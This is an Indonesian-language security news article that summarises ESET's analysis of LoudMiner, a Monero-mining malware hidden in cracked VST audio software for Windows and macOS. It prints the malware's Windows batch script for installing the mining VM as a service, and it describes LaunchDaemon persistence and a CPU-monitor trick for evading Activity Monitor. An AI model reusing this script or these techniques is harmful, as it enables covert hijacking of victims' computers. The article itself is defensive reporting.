Malware penambangan cryptocurrency baru yang dijuluki LoudMiner menggunakan perangkat lunak virtualisasi untuk menyebarkan varian coinminer Linux XMRig pada Windows dan macOS melalui mesin virtual Tiny Core Linux.
Malware ini dibundel dalam salinan versi crack Windows dan perangkat lunak macOS VST seperti Propellerhead Reason, Ableton Live, Sylenth1, Nexus, Reaktor, dan AutoTune.
LoudMiner didistribusikan melalui situs web yang dikendalikan penyerang yang saat ini menautkan ke 137 aplikasi terkait VST, 42 diantaranya untuk Windows dan 95 untuk platform macOS, semuanya sering diperbarui dan di-host di 29 server, seperti yang ditemukan oleh Michal Malik dari ESET Research.
LoudMiner menargetkan korban dengan sistem yang kuat
Aktor dibalik ancaman tampaknya menargetkan sistem produksi audio yang dikenal memiliki perangkat keras kelas atas dan berada di bawah beban konstan saat memproses konten audio, cara yang baik untuk menyembunyikan operasi cryptomining Monero secara diam-diam.
Sementara mesin virtual Tiny Core Linux dan coinminer dapat dengan mudah mencapai lebih dari 100 MB ketika tidak terkompresi, pengembang malware tidak benar-benar memiliki alasan untuk menemukan cara untuk mengecilkannya mengingat host VST diketahui cukup besar.
Hal ini memungkinkan untuk menyembunyikan malware “di depan mata,” dengan para korban menyebarkan LoudMiner pada sistem mereka sendiri dengan menginstal perangkat lunak host VST bajakan yang datang “dibundel dengan perangkat lunak virtualisasi, Linux image dan file tambahan yang digunakan untuk mencapai persistensi.”
Selama proses instalasi, LoudMiner adalah yang pertama di-drop di komputer yang sekarang dikompromikan bersama dengan berbagai skrip dan perangkat lunak virtualisasi yang diperlukan untuk menjalankan coinminer Linux VM – QEMU untuk macOS dan VirtualBox untuk Windows – dengan perangkat lunak VST yang diinstal setelahnya.
Menginfeksi komputer Windows dan macOS
Di macOS, LoudMiner akan menambahkan “file plist di /Library/LaunchDaemons dengan RunAtLoad disetel ke true” untuk persistensi, dengan opsi KeepAlive juga disetel ke true, memastikan proses berbahaya akan dimulai kembali jika dihentikan.
Plist ini akan secara otomatis meluncurkan sejumlah skrip shell yang dirancang untuk meluncurkan mesin virtual saat boot dan memuat dua instance dari image yang terinfeksi coinminer.
Pada mesin Windows, malware menggunakan skrip batch untuk meluncurkan image Linux coinminer sebagai layanan untuk memastikan bahwa itu akan diluncurkan kembali setelah restart.
“Image Linux nya adalah Tiny Core Linux 9.0 yang dikonfigurasi untuk menjalankan XMRig, serta beberapa file dan skrip untuk menjaga agar penambang diperbarui terus menerus,” seperti yang dijelaskan oleh Malik, dengan pembaruan yang dilakukan melalui tiga skrip yang berkomunikasi dengan command-and-control (C2)Â LoudMiner melalui SCP (Secure File Copy).
@echo off setlocal EnableExtensions EnableDelayedExpansion "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" setproperty machinefolder "%userprofile%\appdata\roaming" "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" import "c:\vms\tmp\sys00_1.ova" xcopy /Y "C:\Windows\System32\Config\systemprofile\.VirtualBox" "C:\vms\.VirtualBox\" "C:\vms\VmServiceControl.exe" -i del /F "c:\vms\tmp\sys00_1.ova"
Pada Mac yang terinfeksi, malware juga menggunakan “skrip shell monitor CPU dengan daemon yang menyertainya yang dapat memulai/menghentikan penambangan berdasarkan penggunaan CPU dan apakah proses Activity Monitor berjalan,” menurut Malik.
“Skrip monitor CPU dapat memulai dan menghentikan penambangan dengan memuat dan membongkar daemon. Jika proses Activity Monitor berjalan, penambangan berhenti.”
Rincian lebih lanjut tentang empat varian LoudMiner yang ditemukan, daftar lengkap Indicators of Compromise (IoCs), serta info lebih lanjut tentang teknik MITRE ATT&CK yang digunakan dapat ditemukan dalam analisis malware mendalam ESET Research.
